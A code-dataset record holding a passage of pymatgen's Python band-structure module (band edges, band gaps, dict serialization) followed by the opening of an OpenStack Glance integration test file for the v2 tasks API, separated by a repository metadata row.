a dictionary in the {Spin.up:[][{Element:values}],
Spin.down:[][{Element:values}]} format
if there is no projections in the band structure
returns an empty dict
"""
result = {}
structure = self.structure
for spin, v in self.projections.items():
result[spin] = [[collections.defaultdict(float)
for i in range(len(self.kpoints))]
for j in range(self.nb_bands)]
for i, j, k in itertools.product(range(self.nb_bands),
range(len(self.kpoints)),
range(structure.num_sites)):
result[spin][i][j][str(structure[k].specie)] += np.sum(
v[i, j, :, k])
return result
def get_projections_on_elements_and_orbitals(self, el_orb_spec):
"""
Method returning a dictionary of projections on elements and specific
orbitals
Args:
el_orb_spec: A dictionary of Elements and Orbitals for which we want
to have projections on. It is given as: {Element:[orbitals]},
e.g., {'Cu':['d','s']}
Returns:
A dictionary of projections on elements in the
{Spin.up:[][{Element:{orb:values}}],
Spin.down:[][{Element:{orb:values}}]} format
if there is no projections in the band structure returns an empty
dict.
"""
result = {}
structure = self.structure
el_orb_spec = {get_el_sp(el): orbs for el, orbs in el_orb_spec.items()}
for spin, v in self.projections.items():
result[spin] = [[{str(e): collections.defaultdict(float)
for e in el_orb_spec}
for i in range(len(self.kpoints))]
for j in range(self.nb_bands)]
for i, j, k in itertools.product(
range(self.nb_bands), range(len(self.kpoints)),
range(structure.num_sites)):
sp = structure[k].specie
for orb_i in range(len(v[i][j])):
o = Orbital(orb_i).name[0]
if sp in el_orb_spec:
if o in el_orb_spec[sp]:
result[spin][i][j][str(sp)][o] += v[i][j][
orb_i][k]
return result
def is_metal(self, efermi_tol=1e-4):
"""
Check if the band structure indicates a metal by looking if the fermi
level crosses a band.
Returns:
True if a metal, False if not
"""
for spin, values in self.bands.items():
for i in range(self.nb_bands):
if np.any(values[i, :] - self.efermi < -efermi_tol) and \
np.any(values[i, :] - self.efermi > efermi_tol):
return True
return False
def get_vbm(self):
"""
Returns data about the VBM.
Returns:
dict as {"band_index","kpoint_index","kpoint","energy"}
- "band_index": A dict with spin keys pointing to a list of the
indices of the band containing the VBM (please note that you
can have several bands sharing the VBM) {Spin.up:[],
Spin.down:[]}
- "kpoint_index": The list of indices in self.kpoints for the
kpoint vbm. Please note that there can be several
kpoint_indices relating to the same kpoint (e.g., Gamma can
occur at different spots in the band structure line plot)
- "kpoint": The kpoint (as a kpoint object)
- "energy": The energy of the VBM
- "projections": The projections along sites and orbitals of the
VBM if any projection data is available (else it is an empty
dictionnary). The format is similar to the projections field in
BandStructure: {spin:{'Orbital': [proj]}} where the array
[proj] is ordered according to the sites in structure
"""
if self.is_metal():
return {"band_index": [], "kpoint_index": [],
"kpoint": [], "energy": None, "projections": {}}
max_tmp = -float("inf")
index = None
kpointvbm = None
for spin, v in self.bands.items():
for i, j in zip(*np.where(v < self.efermi)):
if v[i, j] > max_tmp:
max_tmp = float(v[i, j])
index = j
kpointvbm = self.kpoints[j]
list_ind_kpts = []
if kpointvbm.label is not None:
for i in range(len(self.kpoints)):
if self.kpoints[i].label == kpointvbm.label:
list_ind_kpts.append(i)
else:
list_ind_kpts.append(index)
# get all other bands sharing the vbm
list_ind_band = collections.defaultdict(list)
for spin in self.bands:
for i in range(self.nb_bands):
if math.fabs(self.bands[spin][i][index] - max_tmp) < 0.001:
list_ind_band[spin].append(i)
proj = {}
for spin, v in self.projections.items():
if len(list_ind_band[spin]) == 0:
continue
proj[spin] = v[list_ind_band[spin][0]][list_ind_kpts[0]]
return {'band_index': list_ind_band,
'kpoint_index': list_ind_kpts,
'kpoint': kpointvbm, 'energy': max_tmp,
'projections': proj}
def get_cbm(self):
"""
Returns data about the CBM.
Returns:
{"band_index","kpoint_index","kpoint","energy"}
- "band_index": A dict with spin keys pointing to a list of the
indices of the band containing the VBM (please note that you
can have several bands sharing the VBM) {Spin.up:[],
Spin.down:[]}
- "kpoint_index": The list of indices in self.kpoints for the
kpoint vbm. Please note that there can be several
kpoint_indices relating to the same kpoint (e.g., Gamma can
occur at different spots in the band structure line plot)
- "kpoint": The kpoint (as a kpoint object)
- "energy": The energy of the VBM
- "projections": The projections along sites and orbitals of the
VBM if any projection data is available (else it is an empty
dictionnary). The format is similar to the projections field in
BandStructure: {spin:{'Orbital': [proj]}} where the array
[proj] is ordered according to the sites in structure
"""
if self.is_metal():
return {"band_index": [], "kpoint_index": [],
"kpoint": [], "energy": None, "projections": {}}
max_tmp = float("inf")
index = None
kpointcbm = None
for spin, v in self.bands.items():
for i, j in zip(*np.where(v >= self.efermi)):
if v[i, j] < max_tmp:
max_tmp = float(v[i, j])
index = j
kpointcbm = self.kpoints[j]
list_index_kpoints = []
if kpointcbm.label is not None:
for i in range(len(self.kpoints)):
if self.kpoints[i].label == kpointcbm.label:
list_index_kpoints.append(i)
else:
list_index_kpoints.append(index)
# get all other bands sharing the cbm
list_index_band = collections.defaultdict(list)
for spin in self.bands:
for i in range(self.nb_bands):
if math.fabs(self.bands[spin][i][index] - max_tmp) < 0.001:
list_index_band[spin].append(i)
proj = {}
for spin, v in self.projections.items():
if len(list_index_band[spin]) == 0:
continue
proj[spin] = v[list_index_band[spin][0]][list_index_kpoints[0]]
return {'band_index': list_index_band,
'kpoint_index': list_index_kpoints,
'kpoint': kpointcbm, 'energy': max_tmp,
'projections': proj}
def get_band_gap(self):
"""
Returns band gap data.
Returns:
A dict {"energy","direct","transition"}:
"energy": band gap energy
"direct": A boolean telling if the gap is direct or not
"transition": kpoint labels of the transition (e.g., "\\Gamma-X")
"""
if self.is_metal():
return {"energy": 0.0, "direct": False, "transition": None}
cbm = self.get_cbm()
vbm = self.get_vbm()
result = dict(direct=False, energy=0.0, transition=None)
result["energy"] = cbm["energy"] - vbm["energy"]
if (cbm["kpoint"].label is not None and cbm["kpoint"].label == vbm[
"kpoint"].label) \
or np.linalg.norm(cbm["kpoint"].cart_coords
- vbm["kpoint"].cart_coords) < 0.01:
result["direct"] = True
result["transition"] = "-".join(
[str(c.label) if c.label is not None else
str("(") + ",".join(["{0:.3f}".format(c.frac_coords[i])
for i in range(3)])
+ str(")") for c in [vbm["kpoint"], cbm["kpoint"]]])
return result
def get_direct_band_gap_dict(self):
"""
Returns a dictionary of information about the direct
band gap
Returns:
a dictionary of the band gaps indexed by spin
along with their band indices and k-point index
"""
if self.is_metal():
raise ValueError("get_direct_band_gap_dict should"
"only be used with non-metals")
direct_gap_dict = {}
for spin, v in self.bands.items():
above = v[np.all(v > self.efermi, axis=1)]
min_above = np.min(above, axis=0)
below = v[np.all(v < self.efermi, axis=1)]
max_below = np.max(below, axis=0)
diff = min_above - max_below
kpoint_index = np.argmin(diff)
band_indices = [np.argmax(below[:, kpoint_index]),
np.argmin(above[:, kpoint_index]) + len(below)]
direct_gap_dict[spin] = {"value": diff[kpoint_index],
"kpoint_index": kpoint_index,
"band_indices": band_indices}
return direct_gap_dict
def get_direct_band_gap(self):
"""
Returns the direct band gap.
Returns:
the value of the direct band gap
"""
if self.is_metal():
return 0.0
dg = self.get_direct_band_gap_dict()
return min(v['value'] for v in dg.values())
def get_sym_eq_kpoints(self, kpoint, cartesian=False, tol=1e-2):
"""
Returns a list of unique symmetrically equivalent k-points.
Args:
kpoint (1x3 array): coordinate of the k-point
cartesian (bool): kpoint is in cartesian or fractional coordinates
tol (float): tolerance below which coordinates are considered equal
Returns:
([1x3 array] or None): if structure is not available returns None
"""
if not self.structure:
return None
sg = SpacegroupAnalyzer(self.structure)
symmops = sg.get_point_group_operations(cartesian=cartesian)
points = np.dot(kpoint, [m.rotation_matrix for m in symmops])
rm_list = []
# identify and remove duplicates from the list of equivalent k-points:
for i in range(len(points) - 1):
for j in range(i + 1, len(points)):
if np.allclose(pbc_diff(points[i], points[j]), [0, 0, 0], tol):
rm_list.append(i)
break
return np.delete(points, rm_list, axis=0)
def get_kpoint_degeneracy(self, kpoint, cartesian=False, tol=1e-2):
"""
Returns degeneracy of a given k-point based on structure symmetry
Args:
kpoint (1x3 array): coordinate of the k-point
cartesian (bool): kpoint is in cartesian or fractional coordinates
tol (float): tolerance below which coordinates are considered equal
Returns:
(int or None): degeneracy or None if structure is not available
"""
all_kpts = self.get_sym_eq_kpoints(kpoint, cartesian, tol=tol)
if all_kpts is not None:
return len(all_kpts)
def as_dict(self):
"""
Json-serializable dict representation of BandStructureSymmLine.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"lattice_rec": self.lattice_rec.as_dict(), "efermi": self.efermi,
"kpoints": []}
# kpoints are not kpoint objects dicts but are frac coords (this makes
# the dict smaller and avoids the repetition of the lattice
for k in self.kpoints:
d["kpoints"].append(k.as_dict()["fcoords"])
d["bands"] = {str(int(spin)): self.bands[spin]
for spin in self.bands}
d["is_metal"] = self.is_metal()
vbm = self.get_vbm()
d["vbm"] = {"energy": vbm["energy"],
"kpoint_index": vbm["kpoint_index"],
"band_index": {str(int(spin)): vbm["band_index"][spin]
for spin in vbm["band_index"]},
'projections': {str(spin): v.tolist() for spin, v in vbm[
'projections'].items()}}
cbm = self.get_cbm()
d['cbm'] = {'energy': cbm['energy'],
'kpoint_index': cbm['kpoint_index'],
'band_index': {str(int(spin)): cbm['band_index'][spin]
for spin in cbm['band_index']},
'projections': {str(spin): v.tolist() for spin, v in cbm[
'projections'].items()}}
d['band_gap'] = self.get_band_gap()
d['labels_dict'] = {}
d['is_spin_polarized'] = self.is_spin_polarized
for c in self.labels_dict:
d['labels_dict'][c] = self.labels_dict[c].as_dict()['fcoords']
d['projections'] = {}
if len(self.projections) != 0:
d['structure'] = self.structure.as_dict()
d['projections'] = {str(int(spin)): np.array(v).tolist()
for spin, v in self.projections.items()}
return d
@classmethod
def from_dict(cls, d):
"""
Create from dict.
Args:
A dict with all data for a band structure object.
Returns:
A BandStructure object
"""
labels_dict = d['labels_dict']
projections = {}
structure = None
if isinstance(list(d['bands'].values())[0], dict):
eigenvals = {Spin(int(k)): np.array(d['bands'][k]['data'])
for k in d['bands']}
else:
eigenvals = {Spin(int(k)): d['bands'][k] for k in d['bands']}
if 'structure' in d:
structure = Structure.from_dict(d['structure'])
if d.get('projections'):
projections = {Spin(int(spin)): np.array(v)
for spin, v in d["projections"].items()}
return BandStructure(
d['kpoints'], eigenvals,
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
@classmethod
def from_old_dict(cls, d):
"""
Args:
d (dict): A dict with all data for a band structure symm line
object.
Returns:
A BandStructureSymmLine object
"""
# Strip the label to recover initial string (see trick used in as_dict to handle $ chars)
labels_dict = {k.strip(): v for k, v in d['labels_dict'].items()}
projections = {}
structure = None
if 'projections' in d and len(d['projections']) != 0:
structure = Structure.from_dict(d['structure'])
projections = {}
for spin in d['projections']:
dd = []
for i in range(len(d['projections'][spin])):
ddd = []
for j in range(len(d['projections'][spin][i])):
dddd = []
for k in range(len(d['projections'][spin][i][j])):
ddddd = []
orb = Orbital(k).name
for l in range(len(d['projections'][spin][i][j][
orb])):
ddddd.append(d['projections'][spin][i][j][
orb][l])
dddd.append(np.array(ddddd))
ddd.append(np.array(dddd))
dd.append(np.array(ddd))
projections[Spin(int(spin))] = np.array(dd)
return BandStructure(
d['kpoints'], {Spin(int(k)): d['bands'][k] for k in d['bands']},
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
class BandStructureSymmLine(BandStructure, MSONable):
"""
This object stores band structures along selected (symmetry) lines in the
Brillouin zone. We call the different symmetry lines (ex: \\Gamma to Z)
"branches".
Args:
kpoints: list of kpoint as numpy arrays, in frac_coords of the
given lattice by default
eigenvals: dict of energies for spin up and spin down
{Spin.up:[][],Spin.down:[][]}, the first index of the array
[][] refers to the band and the second to the index of the
kpoint. The kpoints are ordered according to the order of the
kpoints array. If the band structure is not spin polarized, we
only store one data set under Spin.up.
lattice: The reciprocal lattice.
Pymatgen uses the physics convention of reciprocal lattice vectors
WITH a 2*pi coefficient
efermi: fermi energy
label_dict: (dict) of {} this link a kpoint (in frac coords or
cartesian coordinates depending on the coords).
coords_are_cartesian: Whether coordinates are cartesian.
structure: The crystal structure (as a pymatgen Structure object)
associated with the band structure. This is needed if we
provide projections to the band structure.
projections: dict of orbital projections as {spin: ndarray}. The
indices of the ndarrayare [band_index, kpoint_index, orbital_index,
ion_index].If the band structure is not spin polarized, we only
store one data set under Spin.up.
"""
def __init__(self, kpoints, eigenvals, lattice, efermi, labels_dict,
coords_are_cartesian=False, structure=None,
projections=None):
super(BandStructureSymmLine, self).__init__(
kpoints, eigenvals, lattice, efermi, labels_dict,
coords_are_cartesian, structure, projections)
self.distance = []
self.branches = []
one_group = []
branches_tmp = []
# get labels and distance for each kpoint
previous_kpoint = self.kpoints[0]
previous_distance = 0.0
previous_label = self.kpoints[0].label
for i in range(len(self.kpoints)):
label = self.kpoints[i].label
if label is not None and previous_label is not None:
self.distance.append(previous_distance)
else:
self.distance.append(
np.linalg.norm(self.kpoints[i].cart_coords -
previous_kpoint.cart_coords) +
previous_distance)
previous_kpoint = self.kpoints[i]
previous_distance = self.distance[i]
if label:
if previous_label:
if len(one_group) != 0:
branches_tmp.append(one_group)
one_group = []
previous_label = label
one_group.append(i)
if len(one_group) != 0:
branches_tmp.append(one_group)
for b in branches_tmp:
self.branches.append(
{"start_index": b[0], "end_index": b[-1],
"name": str(self.kpoints[b[0]].label) + "-" +
str(self.kpoints[b[-1]].label)})
self.is_spin_polarized = False
if len(self.bands) == 2:
self.is_spin_polarized = True
def get_equivalent_kpoints(self, index):
"""
Returns the list of kpoint indices equivalent (meaning they are the
same frac coords) to the given one.
Args:
index: the kpoint index
Returns:
a list of equivalent indices
TODO: now it uses the label we might want to use coordinates instead
(in case there was a mislabel)
"""
# if the kpoint has no label it can"t have a repetition along the band
# structure line object
if self.kpoints[index].label is None:
return [index]
list_index_kpoints = []
for i in range(len(self.kpoints)):
if self.kpoints[i].label == self.kpoints[index].label:
list_index_kpoints.append(i)
return list_index_kpoints
def get_branch(self, index):
"""
Returns in what branch(es) is the kpoint. There can be several
branches.
Args:
index: the kpoint index
Returns:
A list of dictionaries [{"name","start_index","end_index","index"}]
indicating all branches in which the k_point is. It takes into
account the fact that one kpoint (e.g., \\Gamma) can be in several
branches
"""
to_return = []
for i in self.get_equivalent_kpoints(index):
for b in self.branches:
if b["start_index"] <= i <= b["end_index"]:
to_return.append({"name": b["name"],
"start_index": b["start_index"],
"end_index": b["end_index"],
"index": i})
return to_return
def apply_scissor(self, new_band_gap):
"""
Apply a scissor operator (shift of the CBM) to fit the given band gap.
If it's a metal. We look for the band crossing the fermi level
and shift this one up. This will not work all the time for metals!
Args:
new_band_gap: the band gap the scissor band structure need to have.
Returns:
a BandStructureSymmLine object with the applied scissor shift
"""
if self.is_metal():
# moves then the highest index band crossing the fermi level
# find this band...
max_index = -1000
# spin_index = None
for i in range(self.nb_bands):
below = False
above = False
for j in range(len(self.kpoints)):
if self.bands[Spin.up][i][j] < self.efermi:
below = True
if self.bands[Spin.up][i][j] > self.efermi:
above = True
if above and below:
if i > max_index:
max_index = i
# spin_index = Spin.up
if self.is_spin_polarized:
below = False
above = False
for j in range(len(self.kpoints)):
if self.bands[Spin.down][i][j] < self.efermi:
below = True
if self.bands[Spin.down][i][j] > self.efermi:
above = True
if above and below:
if i > max_index:
max_index = i
# spin_index = Spin.down
old_dict = self.as_dict()
shift = new_band_gap
for spin in old_dict['bands']:
for k in range(len(old_dict['bands'][spin])):
for v in range(len(old_dict['bands'][spin][k])):
if k >= max_index:
old_dict['bands'][spin][k][v] = \
old_dict['bands'][spin][k][v] + shift
else:
shift = new_band_gap - self.get_band_gap()['energy']
old_dict = self.as_dict()
for spin in old_dict['bands']:
for k in range(len(old_dict['bands'][spin])):
for v in range(len(old_dict['bands'][spin][k])):
if old_dict['bands'][spin][k][v] >= \
old_dict['cbm']['energy']:
old_dict['bands'][spin][k][v] = \
old_dict['bands'][spin][k][v] + shift
old_dict['efermi'] = old_dict['efermi'] + shift
return BandStructureSymmLine.from_dict(old_dict)
def as_dict(self):
"""
Json-serializable dict representation of BandStructureSymmLine.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"lattice_rec": self.lattice_rec.as_dict(), "efermi": self.efermi,
"kpoints": []}
# kpoints are not kpoint objects dicts but are frac coords (this makes
# the dict smaller and avoids the repetition of the lattice
for k in self.kpoints:
d["kpoints"].append(k.as_dict()["fcoords"])
d["branches"] = self.branches
d["bands"] = {str(int(spin)): self.bands[spin].tolist()
for spin in self.bands}
d["is_metal"] = self.is_metal()
vbm = self.get_vbm()
d["vbm"] = {"energy": vbm["energy"],
"kpoint_index": vbm["kpoint_index"],
"band_index": {str(int(spin)): vbm["band_index"][spin]
for spin in vbm["band_index"]},
'projections': {str(spin): v.tolist() for spin, v in vbm[
'projections'].items()}}
cbm = self.get_cbm()
d['cbm'] = {'energy': cbm['energy'],
'kpoint_index': cbm['kpoint_index'],
'band_index': {str(int(spin)): cbm['band_index'][spin]
for spin in cbm['band_index']},
'projections': {str(spin): v.tolist() for spin, v in cbm[
'projections'].items()}}
d['band_gap'] = self.get_band_gap()
d['labels_dict'] = {}
d['is_spin_polarized'] = self.is_spin_polarized
# MongoDB does not accept keys starting with $. Add a blanck space to fix the problem
for c in self.labels_dict:
mongo_key = c if not c.startswith("$") else " " + c
d['labels_dict'][mongo_key] = self.labels_dict[c].as_dict()[
'fcoords']
if len(self.projections) != 0:
d['structure'] = self.structure.as_dict()
d['projections'] = {str(int(spin)): np.array(v).tolist()
for spin, v in self.projections.items()}
return d
@classmethod
def from_dict(cls, d):
"""
Args:
d (dict): A dict with all data for a band structure symm line
object.
Returns:
A BandStructureSymmLine object
"""
try:
# Strip the label to recover initial string (see trick used in as_dict to handle $ chars)
labels_dict = {k.strip(): v for k, v in d['labels_dict'].items()}
projections = {}
structure = None
if d.get('projections'):
if isinstance(d["projections"]['1'][0][0], dict):
raise ValueError("Old band structure dict format detected!")
structure = Structure.from_dict(d['structure'])
projections = {Spin(int(spin)): np.array(v)
for spin, v in d["projections"].items()}
return BandStructureSymmLine(
d['kpoints'], {Spin(int(k)): d['bands'][k]
for k in d['bands']},
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
except:
warnings.warn("Trying from_dict failed. Now we are trying the old "
"format. Please convert your BS dicts to the new "
"format. The old format will be retired in pymatgen "
"5.0.")
return BandStructureSymmLine.from_old_dict(d)
@classmethod
def from_old_dict(cls, d):
"""
Args:
d (dict): A dict with all data for a band structure symm line
object.
Returns:
A BandStructureSymmLine object
"""
# Strip the label to recover initial string (see trick used in as_dict to handle $ chars)
labels_dict = {k.strip(): v for k, v in d['labels_dict'].items()}
projections = {}
structure = None
if 'projections' in d and len(d['projections']) != 0:
structure = Structure.from_dict(d['structure'])
projections = {}
for spin in d['projections']:
dd = []
for i in range(len(d['projections'][spin])):
ddd = []
for j in range(len(d['projections'][spin][i])):
dddd = []
for k in range(len(d['projections'][spin][i][j])):
ddddd = []
orb = Orbital(k).name
for l in range(len(d['projections'][spin][i][j][
orb])):
ddddd.append(d['projections'][spin][i][j][
orb][l])
dddd.append(np.array(ddddd))
ddd.append(np.array(dddd))
dd.append(np.array(ddd))
projections[Spin(int(spin))] = np.array(dd)
return BandStructureSymmLine(
d['kpoints'], {Spin(int(k)): d['bands'][k]
for k in d['bands']},
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
def get_reconstructed_band_structure(list_bs, efermi=None):
"""
This method takes a list of band structures and reconstructs
one band structure object from all of them.
This is typically very useful when you split non self consistent
band structure runs in several independent jobs and want to merge back
the results
Args:
list_bs: A list of BandStructure or BandStructureSymmLine objects.
efermi: The Fermi energy of the reconstructed band structure. If
None is assigned an average of all the Fermi energy in each
object in the list_bs is used.
Returns:
A BandStructure or BandStructureSymmLine object (depending on
the type of the list_bs objects)
"""
if efermi is None:
efermi = sum([b.efermi for b in list_bs]) / len(list_bs)
kpoints = []
labels_dict = {}
rec_lattice = list_bs[0].lattice_rec
nb_bands = min([list_bs[i].nb_bands for i in range(len(list_bs))])
kpoints = np.concatenate([[k.frac_coords for k in bs.kpoints]
for bs in list_bs])
dicts = [bs.labels_dict for bs in list_bs]
labels_dict = {k: v.frac_coords for d in dicts for k, v in d.items()}
eigenvals = {}
eigenvals[Spin.up] = np.concatenate([bs.bands[Spin.up][:nb_bands]
for bs in list_bs], axis=1)
if list_bs[0].is_spin_polarized:
eigenvals[Spin.down] = np.concatenate([bs.bands[Spin.down][:nb_bands]
for bs in list_bs], axis=1)
projections = {}
if len(list_bs[0].projections) != 0:
projs = [bs.projections[Spin.up][:nb_bands] for bs in list_bs]
projections[Spin.up] = np.concatenate(projs, axis=1)
if list_bs[0].is_spin_polarized:
projs = [bs.projections[Spin.down][:nb_bands] for bs in list_bs]
projections[Spin.down] = np.concatenate(projs, axis=1)
if isinstance(list_bs[0], BandStructureSymmLine):
return BandStructureSymmLine(kpoints, eigenvals, rec_lattice,
efermi, labels_dict,
structure=list_bs[0].structure,
projections=projections)
else:
return BandStructure(kpoints, eigenvals, rec_lattice, efermi,
labels_dict, structure=list_bs[0].structure,
projections=projections)
| mit | -676,974,746,694,923,400 | 39.97446 | 101 | 0.53282 | false |
darren-wang/gl | glance/tests/integration/v2/test_tasks_api.py | 5 | 20030 | # Copyright 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from oslo.serialization import jsonutils as json
from oslo_utils import timeutils
from glance.api.v2 import tasks
from glance.tests.integration.v2 import base
TENANT1 = '6838eb7b-6ded-434a-882c-b344c77fe8df'
TENANT2 = '2c014f32-55eb-467d-8fcb-4bd706012f81'
TENANT3 = '5a3e60e8-cfa9-4a9e-a90a-62b42cea92b8'
TENANT4 = 'c6c87f25-8a94-47ed-8c83-053c25f42df4'
def minimal_task_headers(owner='tenant1'):
headers = {
'X-Auth-Token': 'user1:%s:admin' % owner,
'Content-Type': 'application/json',
}
return headers
def _new_task_fixture(**kwargs):
task_data = {
"type": "import",
"input": {
"import_from": "http://example.com",
"import_from_format": "qcow2",
"image_properties": {
'disk_format': 'vhd',
'container_format': 'ovf'
}
}
}
task_data.update(kwargs)
return task_data
class TestTasksApi(base.ApiTest):
def __init__(self, *args, **kwargs):
super(TestTasksApi, self).__init__(*args, **kwargs)
self.api_flavor = 'fakeauth'
self.registry_flavor = 'fakeauth'
def _wait_on_task_execution(self):
"""Wait until all the tasks have finished execution and are in
state of success or failure.
"""
start = timeutils.utcnow()
# wait for maximum of 5 seconds
while timeutils.delta_seconds(start, timeutils.utcnow()) < 5:
wait = False
# Verify that no task is in status of pending or processing
path = "/v2/tasks"
res, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
content_dict = json.loads(content)
self.assertEqual(200, res.status)
res_tasks = content_dict['tasks']
if len(res_tasks) != 0:
for task in res_tasks:
if task['status'] in ('pending', 'processing'):
wait = True
break
if wait:
time.sleep(0.05)
continue
else:
break
def _post_new_task(self, **kwargs):
task_owner = kwargs.get('owner')
headers = minimal_task_headers(task_owner)
task_data = _new_task_fixture()
task_data['input']['import_from'] = "http://example.com"
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(path, 'POST',
headers=headers,
body=body_content)
self.assertEqual(201, response.status)
task = json.loads(content)
task_id = task['id']
self.assertIsNotNone(task_id)
self.assertEqual(task_owner, task['owner'])
self.assertEqual(task_data['type'], task['type'])
self.assertEqual(task_data['input'], task['input'])
return task, task_data
def test_all_task_api(self):
# 0. GET /tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
content_dict = json.loads(content)
self.assertEqual(200, response.status)
self.assertFalse(content_dict['tasks'])
# 1. GET /tasks/{task_id}
# Verify non-existent task
task_id = 'NON_EXISTENT_TASK'
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(404, response.status)
# 2. POST /tasks
# Create a new task
task_owner = 'tenant1'
data, req_input = self._post_new_task(owner=task_owner)
# 3. GET /tasks/{task_id}
# Get an existing task
task_id = data['id']
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
# 4. GET /tasks
# Get all tasks (not deleted)
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
self.assertIsNotNone(content)
data = json.loads(content)
self.assertIsNotNone(data)
self.assertEqual(1, len(data['tasks']))
# NOTE(venkatesh) find a way to get expected_keys from tasks controller
expected_keys = set(['id', 'expires_at', 'type', 'owner', 'status',
'created_at', 'updated_at', 'self', 'schema'])
task = data['tasks'][0]
self.assertEqual(expected_keys, set(task.keys()))
self.assertEqual(req_input['type'], task['type'])
self.assertEqual(task_owner, task['owner'])
self.assertEqual('success', task['status'])
self.assertIsNotNone(task['created_at'])
self.assertIsNotNone(task['updated_at'])
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_task_schema_api(self):
# 0. GET /schemas/task
# Verify schema for task
path = "/v2/schemas/task"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
schema = tasks.get_task_schema()
expected_schema = schema.minimal()
data = json.loads(content)
self.assertIsNotNone(data)
self.assertEqual(expected_schema, data)
# 1. GET /schemas/tasks
# Verify schema for tasks
path = "/v2/schemas/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
schema = tasks.get_collection_schema()
expected_schema = schema.minimal()
data = json.loads(content)
self.assertIsNotNone(data)
self.assertEqual(expected_schema, data)
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_create_new_task(self):
# 0. POST /tasks
# Create a new task with valid input and type
task_data = _new_task_fixture()
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(201, response.status)
data = json.loads(content)
task_id = data['id']
self.assertIsNotNone(task_id)
self.assertEqual(task_owner, data['owner'])
self.assertEqual(task_data['type'], data['type'])
self.assertEqual(task_data['input'], data['input'])
# 1. POST /tasks
# Create a new task with invalid type
# Expect BadRequest(400) Error as response
task_data = _new_task_fixture(type='invalid')
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(400, response.status)
# 1. POST /tasks
# Create a new task with invalid input for type 'import'
# Expect BadRequest(400) Error as response
task_data = _new_task_fixture(task_input='{something: invalid}')
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(400, response.status)
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_tasks_with_filter(self):
# 0. GET /v2/tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertFalse(content_dict['tasks'])
task_ids = []
# 1. Make 2 POST requests on /tasks with various attributes
task_owner = TENANT1
data, req_input1 = self._post_new_task(owner=task_owner)
task_ids.append(data['id'])
task_owner = TENANT2
data, req_input2 = self._post_new_task(owner=task_owner)
task_ids.append(data['id'])
# 2. GET /tasks
# Verify two import tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(2, len(content_dict['tasks']))
# 3. GET /tasks with owner filter
# Verify correct task returned with owner
params = "owner=%s" % TENANT1
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(1, len(content_dict['tasks']))
self.assertEqual(TENANT1, content_dict['tasks'][0]['owner'])
# Check the same for different owner.
params = "owner=%s" % TENANT2
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(1, len(content_dict['tasks']))
self.assertEqual(TENANT2, content_dict['tasks'][0]['owner'])
# 4. GET /tasks with type filter
# Verify correct task returned with type
params = "type=import"
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(2, len(content_dict['tasks']))
actual_task_ids = [task['id'] for task in content_dict['tasks']]
self.assertEqual(set(task_ids), set(actual_task_ids))
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_limited_tasks(self):
"""
Ensure marker and limit query params work
"""
# 0. GET /tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
tasks = json.loads(content)
self.assertFalse(tasks['tasks'])
task_ids = []
# 1. POST /tasks with three tasks with various attributes
task, _ = self._post_new_task(owner=TENANT1)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT2)
task_ids.append(task['id'])
